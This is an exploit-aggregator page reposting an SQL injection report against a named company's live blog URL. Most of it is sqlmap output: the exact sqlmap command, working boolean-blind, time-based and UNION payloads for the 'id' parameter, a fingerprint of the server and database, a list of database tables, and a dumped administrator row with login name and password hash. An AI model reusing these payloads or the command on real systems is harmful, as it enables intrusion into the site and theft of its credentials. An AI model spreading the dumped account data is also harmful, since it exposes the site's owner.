Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021070126

Below is a copy:

Bluetooth Low Energy (BLE) USB Dongle | SQL Injection
# Exploit Title: BleuIO - Bluetooth Low Energy (BLE) USB Dongle | SQL Injection Vulnerability
# Author:  
# Tested On: Kali Linux
# sqlmap -u "https://www.bleuio.com/blog/details.php?id=932" --dbs --batch
---------------------------------------------------------------------------------------------------

.com Commercial

BleuIO - Bluetooth Low Energy (BLE) USB Dongle

https://www.bleuio.com/blog/details.php?id=932

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=932 AND 4987=4987

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=932 AND (SELECT 7660 FROM (SELECT(SLEEP(5)))zddA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=-6397 UNION ALL SELECT NULL,NULL,CONCAT(0x716b787671,0x745168597449744c6279465a6a574f7a7846646c686148795171645856615567797a70544e41764f,0x7176707a71),NULL,NULL-- -
---
the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
the back-end DBMS operating system: Linux Ubuntu
the back-end DBMS: MySQL >= 5.0.12
banner: '5.7.33-0ubuntu0.18.04.1'

available databases [3]:
[+] information_schema
[+] smart_db05
[+] test

Database: smart_db05
[24 tables]
+----------------------------+
| ssd_aiowps_events          |
| ssd_aiowps_failed_logins   |
| ssd_aiowps_global_meta     |
| ssd_aiowps_login_activity  |
| ssd_aiowps_login_lockdown  |
| ssd_aiowps_permanent_block |
| ssd_commentmeta            |
| ssd_comments               |
| ssd_links                  |
| ssd_options                |
| ssd_postmeta               |
| ssd_posts                  |
| ssd_redirection_404        |
| ssd_redirection_groups     |
| ssd_redirection_items      |
| ssd_redirection_logs       |
| ssd_term_relationships     |
| ssd_term_taxonomy          |
| ssd_termmeta               |
| ssd_terms                  |
| ssd_usermeta               |
| ssd_users                  |
| ssd_yoast_seo_links        |
| ssd_yoast_seo_meta         |
+----------------------------+

Database: smart_db05
Table: ssd_users
[1 entry]
+----+----------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url | user_pass                          | user_email          | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
+----+----------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1  | <blank>  | $P$BVCY5ZyykfMnm8e4Qr4zIM2vdvborE/ | [email protected] | ssdAdmin   | 0           | ssdAdmin     | ssdadmin      | 2020-03-23 10:10:38 | <blank>             |
+----+----------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+

Copyright ©2021 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.